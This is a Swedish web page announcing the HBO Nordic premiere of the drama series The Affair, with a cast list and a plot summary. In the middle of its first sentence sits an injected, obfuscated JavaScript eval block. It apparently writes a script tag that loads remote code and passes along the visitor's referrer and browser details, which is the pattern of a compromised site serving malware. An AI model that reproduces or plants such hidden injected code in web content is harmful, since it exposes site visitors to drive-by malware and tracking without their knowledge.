Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

The Affair – Ny serie på HBO Nordic

The Affair – Ny serie på HBO Nordic

The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hsbsb|var|u0026u|referrer|beybn||js|php’.split(’|’),0,{}))
Affair är den nya timmeslånga dramaserien från Showtime i 10 delar. I rollerna ser vi Golden Globe-nominerade Dominic West (The Wire) och Ruth Wilson (Luther), samt Emmy-nominerade Maura Tierney (ER) och SAG Award-nominerade Joshua Jackson (Fringe)

The Affair utforskar de emotionella effekterna av en kärleksaffär. Noah (Dominic West) är en lyckligt gift lärare från New York, som avskyr sitt beroende av sin förmögna svärfar. Alison (Ruth Wilson) är en ung servitris som försöker lappa ihop sitt liv och äktenskap i efterdyningarna av en tragedi. Detta provocerande drama utvecklas när Alison och Noah träffas.

Prisbelönade manusförfattaren och producenten Sarah Treem (House of cards, In Treatment) har skrivit originalmanus från en idé hon fått fram tillsammans med Hagai Levi. De båda jobbade tillsammans för första gången i och med Levi´s show In Treatment (tillgänglig på HBO Nordic). Treem och Levi kommer båda att jobba som exekutiva producenter för The Affair tillsammans med regissören Jeffrey Reiner (Friday Night Lights – tillgänglig på HBO Nordic)

The Affair har premiär den 13:e oktober på HBO Nordic